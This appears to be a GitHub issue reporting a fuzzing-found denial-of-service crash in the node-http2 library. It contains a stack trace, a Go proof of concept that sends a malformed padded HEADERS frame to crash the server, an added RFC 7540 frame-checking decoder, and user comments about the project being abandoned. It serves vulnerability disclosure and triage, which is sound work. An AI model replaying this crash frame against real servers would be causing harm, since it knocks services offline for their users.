illegal frame HEADERS crash from Stream._pushUpstream
DoS found via fuzzing
Crash
/Users/stuartlarsen/Pentests/node-http2/node_modules/http2/lib/protocol/stream.js:627
throw new Error('Sending illegal frame (' + frame.type + ') in ' + this.
^
Error: Sending illegal frame (HEADERS) in CLOSED state.
at Stream.transition [as _transition] (/Users/stuartlarsen/Pentests/node-http2/node_modules/http2/lib/protocol/stream.js:627:13)
at Stream._pushUpstream (/Users/stuartlarsen/Pentests/node-http2/node_modules/http2/lib/protocol/stream.js:230:8)
at Stream.headers (/Users/stuartlarsen/Pentests/node-http2/node_modules/http2/lib/protocol/stream.js:101:8)
at OutgoingResponse.writeHead (/Users/stuartlarsen/Pentests/node-http2/node_modules/http2/lib/http.js:677:15)
at OutgoingResponse._implicitHeaders (/Users/stuartlarsen/Pentests/node-http2/node_modules/http2/lib/http.js:683:10)
at OutgoingResponse.end (/Users/stuartlarsen/Pentests/node-http2/node_modules/http2/lib/http.js:693:8)
at Server.<anonymous> (/Users/stuartlarsen/Pentests/node-http2/server.js:10:12)
at Server.emit (events.js:110:17)
at IncomingRequest.g (events.js:199:16)
at IncomingRequest.emit (events.js:104:17)
PoC
package main

import (
	"crypto/tls"
	"encoding/base64"
	"errors"
	"io"
	"log"
	"net"

	// Predecessor of golang.org/x/net/http2; the Framer calls used here
	// (NewFramer, WriteSettings, WriteSettingsAck, WriteRawFrame) are the same in both.
	"github.com/bradfitz/http2"
)

func main() {
	target := "localhost:1338"
	conn, err := Dial(target, true)
	if err != nil {
		panic(err)
	}
	defer conn.Close()

	// Client connection preface (RFC 7540 section 3.5): the magic string, then a
	// SETTINGS frame. The SETTINGS ACK is sent without waiting to read the server's
	// own SETTINGS.
	if _, err := io.WriteString(conn, http2.ClientPreface); err != nil {
		panic(err)
	}
	framer := http2.NewFramer(conn, conn)
	if err := framer.WriteSettings(); err != nil {
		panic(err)
	}
	if err := framer.WriteSettingsAck(); err != nil {
		panic(err)
	}

	// Fuzzer record the crashing frame came from. FrameType 1 is HEADERS; Flags 30
	// (0x1e) is END_HEADERS|PADDED plus two bits that are unassigned for HEADERS.
	// The record's StreamID is replaced by 3 when the frame is replayed below.
	//{"Flags":30,"FrameMethod":"RawFrame","FrameType":1,"Payload":"3kByAK/43RyeVSakJhdGNY38FBFuFm6fBvCVcc+b3EM0cCHtBkfJP5+v+sa7BTuyx5fJL13FsMpnZwTiQ171Qd3qchmdrPZBBS/gWigV4aBI","StreamID":1311466052}
	err = framer.WriteRawFrame(http2.FrameType(1), http2.Flags(30), 3, FromBase64("3kByAK/43RyeVSakJhdGNY38FBFuFm6fBvCVcc+b3EM0cCHtBkfJP5+v+sa7BTuyx5fJL13FsMpnZwTiQ171Qd3qchmdrPZBBS/gWigV4aBI"))
	if err != nil {
		panic(err)
	}
}

// FromBase64 decodes a fuzzer payload; the input is fixed, so a decode failure is a bug.
func FromBase64(in string) []byte {
	data, err := base64.StdEncoding.DecodeString(in)
	if err != nil {
		panic(err)
	}
	return data
}

// Dial opens a TCP connection to host, wrapped in TLS with ALPN when isTLS is set,
// and fails unless the server selected an HTTP/2 protocol identifier.
func Dial(host string, isTLS bool) (net.Conn, error) {
	log.Printf("Connecting to %s ...", host)
	if !isTLS {
		return net.Dial("tcp", host)
	}
	// SNI takes a bare host name; the target string carries a port, so strip it.
	serverName, _, err := net.SplitHostPort(host)
	if err != nil {
		serverName = host
	}
	cfg := &tls.Config{
		ServerName:         serverName,
		NextProtos:         []string{"h2", "h2-14"}, // final and draft-14 ALPN identifiers
		InsecureSkipVerify: true,                    // local test target; its certificate is not verified
	}
	tc, err := tls.Dial("tcp", host, cfg) // completes the handshake before returning
	if err != nil {
		return nil, err
	}
	log.Printf("Connected to %v", tc.RemoteAddr())
	state := tc.ConnectionState()
	log.Printf("Negotiated protocol %q", state.NegotiatedProtocol)
	// An empty NegotiatedProtocol means ALPN did not select HTTP/2; return a real
	// error so the caller never gets a nil connection with a nil error.
	if state.NegotiatedProtocol == "" {
		tc.Close()
		return nil, errors.New("server did not negotiate HTTP/2 via ALPN")
	}
	return tc, nil
}
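Added example (editor's code, not part of the issue above or of node-http2): a stdlib-only Go decoder that rebuilds the frame the PoC sends (type 1, flags 30, stream 3, the base64 payload above) from raw bytes and runs the checks RFC 7540 section 6.2 requires of a server before a HEADERS frame reaches HPACK or the application. Two things about the fuzzed frame come out of it: flags 30 (0x1e) is END_HEADERS|PADDED plus the unassigned bits 0x2 and 0x10, which a receiver must ignore, and the first payload byte, the Pad Length, is 0xDE (222) on an 81-byte payload, so the padding exceeds the frame and a conforming server answers with a connection error of type PROTOCOL_ERROR instead of dispatching a request; the stack trace above shows the request reaching the handler in server.js and failing when it responded. The check also covers the fuzzer record's stream id 1311466052, which is even and therefore not a stream a client may open, going beyond the stream 3 the PoC uses. Frame, EncodeFrame, ParseFrame, CheckHeaders and UnknownHeadersFlags are names chosen for this example.

```go
package main

import (
	"encoding/base64"
	"encoding/binary"
	"errors"
	"fmt"
)

// HEADERS type and flags (RFC 7540 section 6.2); other flag bits are unassigned for
// HEADERS and must be ignored. The PoC* constants are copied from the PoC above.
const (
	FrameHeaders   uint8  = 0x1
	FlagEndStream  uint8  = 0x1
	FlagEndHeaders uint8  = 0x4
	FlagPadded     uint8  = 0x8
	FlagPriority   uint8  = 0x20
	PoCFlags       uint8  = 30
	PoCStreamID    uint32 = 3
	PoCFuzzStream  uint32 = 1311466052 // stream id in the fuzzer record, replaced by 3 in the PoC
	pocPayloadB64         = "3kByAK/43RyeVSakJhdGNY38FBFuFm6fBvCVcc+b3EM0cCHtBkfJP5+v+sa7BTuyx5fJL13FsMpnZwTiQ171Qd3qchmdrPZBBS/gWigV4aBI"
)

// PoCPayload is the decoded PoC payload; the base64 above is fixed and valid, so the error is dropped.
var PoCPayload, _ = base64.StdEncoding.DecodeString(pocPayloadB64)

// Frame holds the 9-byte header fields and the payload that follows them.
type Frame struct {
	Type     uint8
	Flags    uint8
	StreamID uint32
	Payload  []byte
}

// EncodeFrame lays a frame out as WriteRawFrame does: 24-bit length, type, flags,
// 31-bit stream id with the reserved bit clear, then the payload.
func EncodeFrame(typ, flags uint8, streamID uint32, payload []byte) []byte {
	buf := make([]byte, 9+len(payload))
	n := len(payload)
	buf[0], buf[1], buf[2], buf[3], buf[4] = byte(n>>16), byte(n>>8), byte(n), typ, flags
	binary.BigEndian.PutUint32(buf[5:9], streamID&0x7fffffff)
	copy(buf[9:], payload)
	return buf
}

// ParseFrame splits raw bytes into header fields and payload, rejecting a frame whose length field disagrees with the bytes received.
func ParseFrame(raw []byte) (Frame, error) {
	if len(raw) < 9 {
		return Frame{}, errors.New("FRAME_SIZE_ERROR: short frame header")
	}
	if n := int(raw[0])<<16 | int(raw[1])<<8 | int(raw[2]); n != len(raw)-9 {
		return Frame{}, fmt.Errorf("length field %d but %d payload bytes", n, len(raw)-9)
	}
	return Frame{Type: raw[3], Flags: raw[4], StreamID: binary.BigEndian.Uint32(raw[5:9]) & 0x7fffffff, Payload: raw[9:]}, nil
}

// UnknownHeadersFlags returns the flag bits that have no meaning on HEADERS.
func UnknownHeadersFlags(flags uint8) uint8 {
	return flags &^ (FlagEndStream | FlagEndHeaders | FlagPadded | FlagPriority)
}

// CheckHeaders applies the section 6.2 rules a server must enforce before the frame
// reaches HPACK or the application, and returns the header block fragment.
func CheckHeaders(f Frame) ([]byte, error) {
	if f.Type != FrameHeaders {
		return nil, fmt.Errorf("not a HEADERS frame (type %#x)", f.Type)
	}
	// Clients open only odd streams: HEADERS on stream 0 or an even stream is a connection error (section 5.1.1).
	if f.StreamID == 0 || f.StreamID%2 == 0 {
		return nil, fmt.Errorf("PROTOCOL_ERROR: HEADERS on stream %d", f.StreamID)
	}
	body, padLen := f.Payload, 0
	if f.Flags&FlagPadded != 0 {
		if len(body) < 1 {
			return nil, errors.New("PROTOCOL_ERROR: PADDED set but no Pad Length byte")
		}
		padLen, body = int(body[0]), body[1:]
	}
	if f.Flags&FlagPriority != 0 {
		if len(body) < 5 {
			return nil, errors.New("FRAME_SIZE_ERROR: PRIORITY set but fewer than 5 bytes follow")
		}
		body = body[5:]
	}
	// Padding that exceeds the space left for the header block fragment is a PROTOCOL_ERROR.
	if padLen > len(body) {
		return nil, fmt.Errorf("PROTOCOL_ERROR: Pad Length %d exceeds remaining %d bytes", padLen, len(body))
	}
	return body[:len(body)-padLen], nil
}

func main() {
	f, err := ParseFrame(EncodeFrame(FrameHeaders, PoCFlags, PoCStreamID, PoCPayload))
	if err != nil {
		panic(err)
	}
	frag, err := CheckHeaders(f)
	fmt.Printf("HEADERS stream=%d flags=%#x unassigned=%#x payload=%d pad_len=%d fragment=%d err=%v\n",
		f.StreamID, f.Flags, UnknownHeadersFlags(f.Flags), len(f.Payload), f.Payload[0], len(frag), err)
}
```

The same ParseFrame/CheckHeaders pair can be pointed at any recorded fuzzer frame to triage which protocol rule it breaks before debugging the target, which is usually faster than reading the crash from the server side.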
Created 8 years ago, 14 comments.
@nwgh Does this issue need to be reopened? It’s reliably reproducible for me.
Why is this closed? This still happens using node v8.4.0 and http2 v3.3.6
@nwgh is this project dead? Maybe you could add anybody (e.g. @kaazing) willing to continue working on this project as a maintainer?
I think it would be pretty lame to block the http2 namespace on npm, having 30,000 downloads a week and just abandoning the project.